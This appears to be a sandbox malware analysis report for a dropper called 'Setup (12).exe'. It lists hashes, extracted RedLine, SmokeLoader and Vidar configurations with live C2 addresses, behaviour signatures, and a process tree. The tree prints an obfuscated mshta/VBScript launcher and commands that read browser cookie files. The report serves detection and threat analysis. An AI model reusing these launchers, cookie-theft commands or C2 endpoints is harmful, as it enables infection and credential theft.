Resubmissions

01-07-2024 18:32

240701-w6yteawhmq 10

01-07-2024 14:52

240701-r82wmaxdnd 10

01-07-2024 14:52

240701-r8syqa1dpp 10

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

Analysis

  • max time kernel
    1802s
  • max time network
    1815s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    21-08-2021 15:04

General

  • Target

    Setup (12).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

redline

Botnet

21_8_r

C2

jekorikani.xyz:80

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 14 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 12 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 28 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 15 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 60 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 29 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
    • Suspicious use of SetThreadContext
    PID:2792
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Drops file in System32 directory
      • Checks processor information in registry
      PID:5980
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
      PID:2584
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2588
      • C:\Users\Admin\AppData\Local\Temp\Setup (12).exe
        "C:\Users\Admin\AppData\Local\Temp\Setup (12).exe"
        1⤵
        • Checks computer location settings
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4444
        • C:\Users\Admin\Documents\4ocMNPFtPFAuw5NwPAdG17FB.exe
          "C:\Users\Admin\Documents\4ocMNPFtPFAuw5NwPAdG17FB.exe"
          2⤵
          • Executes dropped EXE
          • Checks BIOS information in registry
          • Checks whether UAC is enabled
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of AdjustPrivilegeToken
          PID:580
        • C:\Users\Admin\Documents\lk6rdGEjE_s59nTQLJ3FmHY4.exe
          "C:\Users\Admin\Documents\lk6rdGEjE_s59nTQLJ3FmHY4.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:544
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\lk6rdGEjE_s59nTQLJ3FmHY4.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\lk6rdGEjE_s59nTQLJ3FmHY4.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
            3⤵
              PID:4740
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\lk6rdGEjE_s59nTQLJ3FmHY4.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\lk6rdGEjE_s59nTQLJ3FmHY4.exe" ) do taskkill -f -iM "%~NxA"
                4⤵
                  PID:3844
                  • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                    hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                    5⤵
                      PID:4032
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                        6⤵
                          PID:3888
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                            7⤵
                              PID:4296
                          • C:\Windows\SysWOW64\rundll32.exe
                            "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                            6⤵
                            • Loads dropped DLL
                            PID:6004
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill -f -iM "lk6rdGEjE_s59nTQLJ3FmHY4.exe"
                          5⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4152
                  • C:\Users\Admin\Documents\qSKX7PZ7op9RXF2rOx0siMtM.exe
                    "C:\Users\Admin\Documents\qSKX7PZ7op9RXF2rOx0siMtM.exe"
                    2⤵
                      PID:420
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 420 -s 660
                        3⤵
                        • Program crash
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5020
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 420 -s 676
                        3⤵
                        • Program crash
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1032
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 420 -s 668
                        3⤵
                        • Program crash
                        • Suspicious use of AdjustPrivilegeToken
                        PID:492
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 420 -s 732
                        3⤵
                        • Program crash
                        • Suspicious use of AdjustPrivilegeToken
                        PID:416
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 420 -s 1136
                        3⤵
                        • Program crash
                        PID:6088
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 420 -s 1160
                        3⤵
                        • Program crash
                        PID:4832
                    • C:\Users\Admin\Documents\0tMKZaj3Zn3wLnJ0DK9KXAQc.exe
                      "C:\Users\Admin\Documents\0tMKZaj3Zn3wLnJ0DK9KXAQc.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4236
                      • C:\Users\Admin\AppData\Roaming\8197936.exe
                        "C:\Users\Admin\AppData\Roaming\8197936.exe"
                        3⤵
                          PID:2732
                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                            4⤵
                            • Executes dropped EXE
                            PID:1136
                        • C:\Users\Admin\AppData\Roaming\3477508.exe
                          "C:\Users\Admin\AppData\Roaming\3477508.exe"
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3988
                        • C:\Users\Admin\AppData\Roaming\1454067.exe
                          "C:\Users\Admin\AppData\Roaming\1454067.exe"
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of AdjustPrivilegeToken
                          PID:652
                      • C:\Users\Admin\Documents\dRbGHxbbCeJZidyjPZevtz4h.exe
                        "C:\Users\Admin\Documents\dRbGHxbbCeJZidyjPZevtz4h.exe"
                        2⤵
                          PID:652
                          • C:\Users\Admin\Documents\dRbGHxbbCeJZidyjPZevtz4h.exe
                            C:\Users\Admin\Documents\dRbGHxbbCeJZidyjPZevtz4h.exe
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3560
                        • C:\Users\Admin\Documents\c39ee5mgPXzq_3uWmF69ju8h.exe
                          "C:\Users\Admin\Documents\c39ee5mgPXzq_3uWmF69ju8h.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:500
                          • C:\Users\Admin\Documents\c39ee5mgPXzq_3uWmF69ju8h.exe
                            "C:\Users\Admin\Documents\c39ee5mgPXzq_3uWmF69ju8h.exe"
                            3⤵
                            • Executes dropped EXE
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious behavior: MapViewOfSection
                            PID:3256
                        • C:\Users\Admin\Documents\QJqA4N61RhZoKf1uT6_LulWp.exe
                          "C:\Users\Admin\Documents\QJqA4N61RhZoKf1uT6_LulWp.exe"
                          2⤵
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2724
                        • C:\Users\Admin\Documents\MJLPtM9KUurlBftbJyCLBDJo.exe
                          "C:\Users\Admin\Documents\MJLPtM9KUurlBftbJyCLBDJo.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:2412
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 760
                            3⤵
                            • Program crash
                            PID:5396
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 796
                            3⤵
                            • Program crash
                            PID:6032
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 816
                            3⤵
                            • Program crash
                            PID:1176
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 828
                            3⤵
                            • Program crash
                            PID:4904
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 960
                            3⤵
                            • Program crash
                            PID:4580
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 996
                            3⤵
                            • Program crash
                            PID:5516
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 1052
                            3⤵
                            • Program crash
                            PID:4524
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 1360
                            3⤵
                            • Executes dropped EXE
                            • Program crash
                            PID:5724
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 1320
                            3⤵
                            • Program crash
                            PID:5760
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 1448
                            3⤵
                            • Program crash
                            PID:6164
                        • C:\Users\Admin\Documents\NMlZxC5VVvJrPXz1c4Uxl6Af.exe
                          "C:\Users\Admin\Documents\NMlZxC5VVvJrPXz1c4Uxl6Af.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:2052
                        • C:\Users\Admin\Documents\qB1ldSuP5wZoQOYW82R2jQVh.exe
                          "C:\Users\Admin\Documents\qB1ldSuP5wZoQOYW82R2jQVh.exe"
                          2⤵
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1528
                        • C:\Users\Admin\Documents\UihIFQgNVryVKzRrE0rpY645.exe
                          "C:\Users\Admin\Documents\UihIFQgNVryVKzRrE0rpY645.exe"
                          2⤵
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          PID:1372
                        • C:\Users\Admin\Documents\5nVLKKHxhCWCi16AxCIRyWwd.exe
                          "C:\Users\Admin\Documents\5nVLKKHxhCWCi16AxCIRyWwd.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:1140
                          • C:\Users\Admin\Documents\5nVLKKHxhCWCi16AxCIRyWwd.exe
                            C:\Users\Admin\Documents\5nVLKKHxhCWCi16AxCIRyWwd.exe
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3504
                        • C:\Users\Admin\Documents\APzZ1F1fe0BboAn7EmjJglBE.exe
                          "C:\Users\Admin\Documents\APzZ1F1fe0BboAn7EmjJglBE.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:296
                          • C:\Users\Admin\Documents\APzZ1F1fe0BboAn7EmjJglBE.exe
                            C:\Users\Admin\Documents\APzZ1F1fe0BboAn7EmjJglBE.exe
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4684
                        • C:\Users\Admin\Documents\V2MgpxFGtFcTfnbiUa94a22Y.exe
                          "C:\Users\Admin\Documents\V2MgpxFGtFcTfnbiUa94a22Y.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:1988
                        • C:\Users\Admin\Documents\GV8pBAfFoSXC1yW_TD4bG4jv.exe
                          "C:\Users\Admin\Documents\GV8pBAfFoSXC1yW_TD4bG4jv.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:196
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 196 -s 660
                            3⤵
                            • Program crash
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4260
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 196 -s 680
                            3⤵
                            • Program crash
                            • Suspicious use of AdjustPrivilegeToken
                            PID:752
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 196 -s 636
                            3⤵
                            • Program crash
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4272
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 196 -s 656
                            3⤵
                            • Program crash
                            • Suspicious use of AdjustPrivilegeToken
                            PID:904
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 196 -s 1132
                            3⤵
                            • Program crash
                            PID:5400
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 196 -s 1180
                            3⤵
                            • Program crash
                            PID:4540
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 196 -s 1124
                            3⤵
                            • Suspicious use of NtCreateProcessExOtherParentProcess
                            • Program crash
                            PID:5588
                        • C:\Users\Admin\Documents\v3B2UH3d07vYsOTd90iVXv2x.exe
                          "C:\Users\Admin\Documents\v3B2UH3d07vYsOTd90iVXv2x.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:2832
                          • C:\Users\Admin\Documents\v3B2UH3d07vYsOTd90iVXv2x.exe
                            "C:\Users\Admin\Documents\v3B2UH3d07vYsOTd90iVXv2x.exe"
                            3⤵
                            • Modifies data under HKEY_USERS
                            PID:8264
                        • C:\Users\Admin\Documents\UfvGEwDhu3SVKU42kPz9s_tN.exe
                          "C:\Users\Admin\Documents\UfvGEwDhu3SVKU42kPz9s_tN.exe"
                          2⤵
                          • Executes dropped EXE
                          • Drops file in Program Files directory
                          PID:4372
                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                            3⤵
                            • Executes dropped EXE
                            • Checks whether UAC is enabled
                            • Drops file in Program Files directory
                            PID:2212
                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                            "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                            3⤵
                            • Executes dropped EXE
                            PID:4500
                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              4⤵
                              • Executes dropped EXE
                              PID:4232
                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              4⤵
                              • Executes dropped EXE
                              PID:5404
                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              4⤵
                              • Executes dropped EXE
                              PID:5448
                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              4⤵
                              • Executes dropped EXE
                              PID:5312
                            • C:\Windows\system32\WerFault.exe
                              C:\Windows\system32\WerFault.exe -u -p 4500 -s 1252
                              4⤵
                              • Suspicious use of NtCreateProcessExOtherParentProcess
                              • Program crash
                              PID:2548
                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                            "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                            3⤵
                            • Executes dropped EXE
                            PID:2264
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              4⤵
                              • Executes dropped EXE
                              PID:5088
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              4⤵
                                PID:5724
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                4⤵
                                  PID:3304
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  4⤵
                                    PID:2472
                              • C:\Users\Admin\Documents\hjjew9sL8gsBeE0_zs4eieCz.exe
                                "C:\Users\Admin\Documents\hjjew9sL8gsBeE0_zs4eieCz.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:1944
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1944 -s 484
                                  3⤵
                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                  • Drops file in Windows directory
                                  • Program crash
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4108
                              • C:\Users\Admin\Documents\zOabZrY9t7QN2ASWJO0eqRmT.exe
                                "C:\Users\Admin\Documents\zOabZrY9t7QN2ASWJO0eqRmT.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:1316
                                • C:\Users\Admin\Documents\zOabZrY9t7QN2ASWJO0eqRmT.exe
                                  "C:\Users\Admin\Documents\zOabZrY9t7QN2ASWJO0eqRmT.exe" -q
                                  3⤵
                                  • Executes dropped EXE
                                  PID:4756
                              • C:\Users\Admin\Documents\BTG8tTeIXBo6BZuisCMKLkaa.exe
                                "C:\Users\Admin\Documents\BTG8tTeIXBo6BZuisCMKLkaa.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:4976
                                • C:\Users\Admin\AppData\Local\Temp\is-JG1DH.tmp\BTG8tTeIXBo6BZuisCMKLkaa.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-JG1DH.tmp\BTG8tTeIXBo6BZuisCMKLkaa.tmp" /SL5="$10290,138429,56832,C:\Users\Admin\Documents\BTG8tTeIXBo6BZuisCMKLkaa.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of FindShellTrayWindow
                                  PID:4924
                                  • C:\Users\Admin\AppData\Local\Temp\is-LFR6J.tmp\Setup.exe
                                    "C:\Users\Admin\AppData\Local\Temp\is-LFR6J.tmp\Setup.exe" /Verysilent
                                    4⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    PID:3876
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                              1⤵
                                PID:2444
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                1⤵
                                  PID:2404
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                  1⤵
                                    PID:1872
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                    1⤵
                                      PID:1416
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                      1⤵
                                        PID:1356
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                        1⤵
                                          PID:1208
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                          1⤵
                                            PID:1104
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                            1⤵
                                            • Drops file in System32 directory
                                            PID:944
                                            • C:\Users\Admin\AppData\Roaming\tjrasfw
                                              C:\Users\Admin\AppData\Roaming\tjrasfw
                                              2⤵
                                              • Suspicious use of SetThreadContext
                                              PID:2472
                                              • C:\Users\Admin\AppData\Roaming\tjrasfw
                                                C:\Users\Admin\AppData\Roaming\tjrasfw
                                                3⤵
                                                • Checks SCSI registry key(s)
                                                • Suspicious behavior: MapViewOfSection
                                                PID:5884
                                            • C:\Users\Admin\AppData\Roaming\tjrasfw
                                              C:\Users\Admin\AppData\Roaming\tjrasfw
                                              2⤵
                                              • Suspicious use of SetThreadContext
                                              PID:1256
                                              • C:\Users\Admin\AppData\Roaming\tjrasfw
                                                C:\Users\Admin\AppData\Roaming\tjrasfw
                                                3⤵
                                                • Checks SCSI registry key(s)
                                                PID:5508
                                            • C:\Users\Admin\AppData\Roaming\tjrasfw
                                              C:\Users\Admin\AppData\Roaming\tjrasfw
                                              2⤵
                                              • Suspicious use of SetThreadContext
                                              PID:6692
                                              • C:\Users\Admin\AppData\Roaming\tjrasfw
                                                C:\Users\Admin\AppData\Roaming\tjrasfw
                                                3⤵
                                                • Checks SCSI registry key(s)
                                                PID:4528
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                            1⤵
                                              PID:1004
                                            • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                              "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                              1⤵
                                              • Executes dropped EXE
                                              PID:4264
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 1400
                                                2⤵
                                                • Program crash
                                                PID:6832
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 1508
                                                2⤵
                                                • Program crash
                                                PID:688
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 1400
                                                2⤵
                                                • Program crash
                                                PID:6492
                                            • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                              "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                              1⤵
                                              • Executes dropped EXE
                                              PID:2188
                                              • C:\Users\Admin\AppData\Local\Temp\is-77IFM.tmp\Inlog.tmp
